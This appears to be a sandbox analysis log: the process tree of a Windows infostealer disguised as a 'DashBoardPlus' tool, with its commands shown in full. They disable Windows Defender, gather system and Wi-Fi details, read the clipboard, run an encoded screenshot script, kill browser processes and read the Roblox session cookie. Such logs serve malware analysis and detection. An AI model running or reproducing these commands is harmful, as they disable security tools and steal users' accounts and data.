C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:12⤵PID:4156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:12⤵PID:4132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:12⤵PID:2456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:12⤵PID:5052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:12⤵PID:5232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:12⤵PID:5244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5672 /prefetch:82⤵PID:5432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:12⤵PID:5440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6184 /prefetch:82⤵PID:5492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,10034664425023483772,8626008680509861431,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4804 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1984
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4432
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4252
-
C:\Users\Admin\Downloads\winrar-x64-701.exe"C:\Users\Admin\Downloads\winrar-x64-701.exe"1⤵
- Executes dropped EXE
PID:5948
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\DashBoardPlus\" -ad -an -ai#7zMap28114:106:7zEvent207671⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5148
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\DashBoardPlus\" -ad -an -ai#7zMap22715:88:7zEvent319741⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5716
-
C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"1⤵
- Executes dropped EXE
PID:5792 -
C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1600 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe'"3⤵PID:3836
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NO KEY FOUND CONTACT 9P2D TO BUY!', 0, '3x8de', 0+16);close()""3⤵PID:2920
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NO KEY FOUND CONTACT 9P2D TO BUY!', 0, '3x8de', 0+16);close()"4⤵PID:5560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5248
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5372
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:3216
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:6120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5192
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5164
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1368 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2940
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:2436
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fv10jmjb\fv10jmjb.cmdline"5⤵PID:5044
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES54A4.tmp" "c:\Users\Admin\AppData\Local\Temp\fv10jmjb\CSCDFF69DF2759D4F73BAC6CFB8E6B2B231.TMP"6⤵PID:2964
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5492
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2844
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3928
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2540"3⤵PID:5164
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 25404⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3440
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5056"3⤵PID:4596
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 50564⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1500
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2564"3⤵PID:1368
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 25644⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2780"3⤵PID:1728
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 27804⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3492"3⤵PID:1940
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 34924⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4588"3⤵PID:444
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 45884⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5052"3⤵PID:5196
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 50524⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5232"3⤵PID:2352
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 52324⤵
- Kills process with taskkill
PID:6100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:5044
-
C:\Windows\system32\getmac.exegetmac4⤵PID:5116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5440"3⤵PID:5968
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 54404⤵
- Kills process with taskkill
PID:4584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1984"3⤵PID:2384
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19844⤵
- Kills process with taskkill
PID:2568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:5856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5944
-
-
-
